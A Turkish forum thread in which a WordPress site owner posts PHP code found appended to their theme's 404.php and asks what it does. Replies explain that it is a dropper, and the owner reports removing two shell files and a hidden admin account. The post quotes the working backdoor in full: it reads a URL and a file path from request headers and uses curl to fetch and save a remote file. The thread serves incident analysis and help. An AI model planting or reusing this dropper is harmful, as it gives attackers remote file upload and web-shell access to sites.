Üye Girişi
Bağlan Google+ ile Bağlan Facebook ile Bağlan
Yeni Kayıt
Tüm Forumlar
  • Tüm Forumlar
  • Web Tasarım - Programlama
  • Yazılım Geliştirme
  • PHP / CGI
  • Bu Konuda
Şimdi Ara

Wordpress 404.php de bu kodu buldum Hacklendim galiba

Sıcak Fırsatlarda Tıklananlar
Editörün Seçtiği Fırsatlar
Daha fazla göster butonu
Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
8 Misafir - 8 Masaüstü
5 sn
5
Cevap
0
Favori
590
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
Konuya Özel
0 oy
Öne Çıkar
Cevapla
Sayfa: 1
Giriş
Mesaj
  • Merhaba,

    wordpress blogumun 404.php sinin en altında

    quote:

    <?php

    $ur = $_SERVER['HTTP_ACCEPT'];

    $f = $_SERVER['HTTP_ACCEPT_LANGUAGE'];

    if (preg_match('/http/i', $ur)) {

    $ch = curl_init($ur);

    $fp = fopen($f, "w");

    curl_setopt($ch, CURLOPT_FILE, $fp);

    curl_setopt($ch, CURLOPT_HEADER, 0);

    curl_exec($ch); curl_close($ch);fclose($fp);

    }

    ?>


    bu konu buldum. Nedir bu acaba ? Ne işlev yapar ?



  • HTTP_ACCEPT içerinde http ile başlayan bir şey varsa onu alıp dizine kaydediyor. Büyük ihtimalle shell yüklemek içindir.
  • üstad dizinde 2 tane shell dosyası buldum ve mysql user table da admin yetkileri verilmiş kullanıcı buldum (panelde gözükmüyordu). bunları temizledim. acaba bu http_accept dedigin şey nedir. Bu dizine yollanan dosyalar nerden geliyor serverda biryerde gizlimidir ?
  • $fp = fopen($f, "w"); bunla bir dosyası sana yazdırıyor içinde de başka çekmek istediği dosyalar vardır büyük ihtimal ya da direkt shell atıp onun üzerinden ilerleyebilir.
    daha sonra CURL ile de yüklemek istediği dosya işlemine başlıyor.

    CURL genelde dosya indirme işlemlerinde ya da bir sayfayı çağırma işlemlerinde kullanılır.
  • curl_init yaptığı url önemli aslında ona baksana $ur variablesine
    • 
Sayfa: 1

Benzer içerikler

- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.
Hizmet kalitesi için çerezleri kullanabiliriz. DH’ye girerek kullanım izni vermiş sayılırsınız.
Anladım Veri Politikamız